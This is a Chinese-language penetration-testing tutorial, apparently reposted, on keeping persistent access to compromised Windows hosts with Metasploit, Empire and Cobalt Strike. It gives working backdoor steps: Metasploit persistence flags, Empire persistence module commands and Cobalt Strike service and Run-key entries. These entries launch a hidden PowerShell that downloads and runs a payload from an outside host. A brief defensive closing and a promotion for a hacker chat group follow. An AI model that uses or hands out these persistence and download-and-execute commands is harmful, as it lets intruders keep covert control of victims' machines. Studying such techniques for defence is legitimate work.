可領全套安全課程、配套攻防靶場
在滲透測試中,有三個非常經典的滲透測試框架--Metasploit、Empire、Cobalt Strike。
那麼,通過漏洞獲取到目標主機權限後,如何利用滲透框架獲得持久性權限呢?
MSF權限維持
使用MSF維持權限的前提是先獲得一個meterpreter shell,通過meterpreter shell獲取持久性shell的方法有兩種:
<strong>Persistence模塊
通過啟動項啟動(persistence)的方式,在目標機器上以反彈回連。
<code>-U:設置後門在用戶登錄後自啟動。該方式會在HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run下添加註冊表信息。推薦使用該參數; -X:設置後門在系統啟動後自啟動。該方式會在HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run下添加註冊表信息。由於權限問題,會導致添加失敗,後門將無法啟動。 -S:作為服務自動啟動代理程序(具有SYSTEM權限)/<code>
<code>-U:設置後門在用戶登錄後自啟動。該方式會在HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run下添加註冊表信息。推薦使用該參數; -X:設置後門在系統啟動後自啟動。該方式會在HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run下添加註冊表信息。由於權限問題,會導致添加失敗,後門將無法啟動。 -S:作為服務自動啟動代理程序(具有SYSTEM權限)/<code>
生成的相關文件位置 :
<code>#後門文件位置: C:\\Windows\\TempC:\\Users\\Administrator\\AppData\\Local\\Temp# 註冊表位置: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\/<code>
<strong>Metsvc 模塊
通過服務(metsvc)啟動的方式,在目標機器啟動後自啟動一個服務,等待連接。
目標主機上開啟了一個Meterpreter服務。
Empire 權限維持
Empire的persistence模塊提供了18種權限維持的方法,大致可以分為四類,即
elevated(管理權限)misc(雜項)powerbreach(內存維持)userland(用戶權限)registry*add_netuserdeadserbackdoor_lnkschtasks*add_sid_history*eventlog*registrywmi*debugger*resolverschtaskswmi_updater*disable_machine_acct_change*
<strong>註冊表
<code>(Empire:agents)>agents(Empire:agents)>interactURL3FZBV(Empire:URL3FZBV)>usemodulepersistence/elevated/registry*(Empire:powershell/persistence/elevated/registry)>setListenertest(Empire:powershell/persistence/elevated/registry)>execute/<code>
因為是開機啟動,所以會彈個黑框,之後還會彈出註冊表添加的powershell啟動項的框,在註冊表位置如下:
<strong>計劃任務
<code>(Empire:agents)>interact9NZ2RWBC(Empire:9NZ2RWBC)>usemodulepersistence/elevated/schtasks*(Empire:powershell/persistence/elevated/schtasks)>setListenertest(Empire:powershell/persistence/elevated/schtasks)>setDailyTime22:50(Empire:powershell/persistence/elevated/schtasks)>execute/<code>
在任務計劃程序庫可以看到-任務為Updater-啟動程序如下可以到為powershell
<strong>wmi
<code>(Empire:agents)>interact9NZ2RWBC(Empire:9NZ2RWBC)>usemodulepersistence/elevated/wmi(Empire:powershell/persistence/elevated/wmi)>setListenertest(Empire:powershell/persistence/elevated/wmi)>run/<code>
如何清除後門,最簡單的方法就是使用Autoruns,選擇WMI選項卡,右鍵就可以刪除惡意後門。
Cobalt Strike權限維持
通過Cobalt Strike拿到一個shell,留後門的方法有很多,下面介紹兩種比較常見的無文件、自啟動後門。
從Cobalt Strike菜單欄,Attacks--Web Drive-by--Scaripted Web Delivery,生成powershell後門。
根據需要可以自己選擇,填寫所需參數默認端口是80(需要注意的就是不要使用重複端口),Type選擇powershell。
點擊Launch後,返回powershell遠程下載執行命令。
<strong>服務自啟動後門
<code>sccreate"Name"binpath="cmd/cstartpowershell.exe-nop-whidden-c\"IEX((new-objectnet.webclient).downloadstring('http://192.168.28.142:8080/a'))\""scdescriptionName"JustForTest"//設置服務的描述字符串scconfigNamestart=auto//設置這個服務為自動啟動netstartName//啟動服務/<code>重啟服務器後,成功返回一個shell。
<strong>註冊表自啟動
在windows啟動項註冊表裡面添加一個木馬程序路徑,如:
<code>beacon>getsystembeacon>shellregaddHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run/v"Keyname"/tREG_SZ/d"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe-nop-whidden-c\"IEX((new-objectnet.webclient).downloadstring('http://192.168.28.142:8080/a'))\""/f/<code>
賬號註銷後,重新登錄,界面上會出現powershell快速閃過消失,成功返回shell。
註冊表還有哪些鍵值可以設置為自啟動:
<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon/<code>
結束語
本文簡單介紹了通過三大滲透框架進行權限維持的幾種方法
瞭解攻擊者常用的滲透框架及後門技術,有助於更好地去發現並解決服務器安全問題。
轉載自:https://www.secpulse.com/archives/113790.html
今天你知道了嗎?
加群,黑客技術大咖在線解答(群號評論區見)
閱讀更多 暗網視界 的文章
